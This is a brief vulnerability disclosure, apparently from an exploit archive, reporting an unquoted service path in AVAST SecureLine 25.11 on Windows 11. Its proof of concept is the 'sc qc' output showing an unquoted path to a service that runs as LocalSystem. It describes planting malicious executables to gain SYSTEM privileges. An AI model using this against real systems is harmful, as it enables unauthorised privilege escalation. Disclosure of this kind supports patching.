Share
## https://sploitus.com/exploit?id=PACKETSTORM:213025
# Exploit Title: AVAST Antivirus 25.11 - Unquoted Service Path
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com
    # Date: 2025-12-17
    # Vendor Homepage:https://www.avast.com/
    # Software Link :
    https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
    # Tested Version: 25.11
    # Tested on OS: Windows 11
    
    
    Description
    AVAST Antivirus 25.11 an unquoted service path vulnerability that allows
    local non-privileged users to potentially execute code with elevated SYSTEM
    privileges. Attackers can exploit the unquoted service path configuration
    to inject malicious executables that will be run with high-level system
    permissions.
    
    
    
    PoC
    C:\>sc qc SecureLine
    [SC] QueryServiceConfig CORRECTO
    
    NOMBRE_SERVICIO: SecureLine
            TIPO : 10 WIN32_OWN_PROCESS
            TIPO_INICIO : 2 AUTO_START
            CONTROL_ERROR : 1 NORMAL
            NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST
    Software\SecureLine\VpnSvc.exe
            GRUPO_ORDEN_CARGA :
            ETIQUETA : 0
            NOMBRE_MOSTRAR : Avast SecureLine
            DEPENDENCIAS :
            NOMBRE_INICIO_SERVICIO: LocalSystem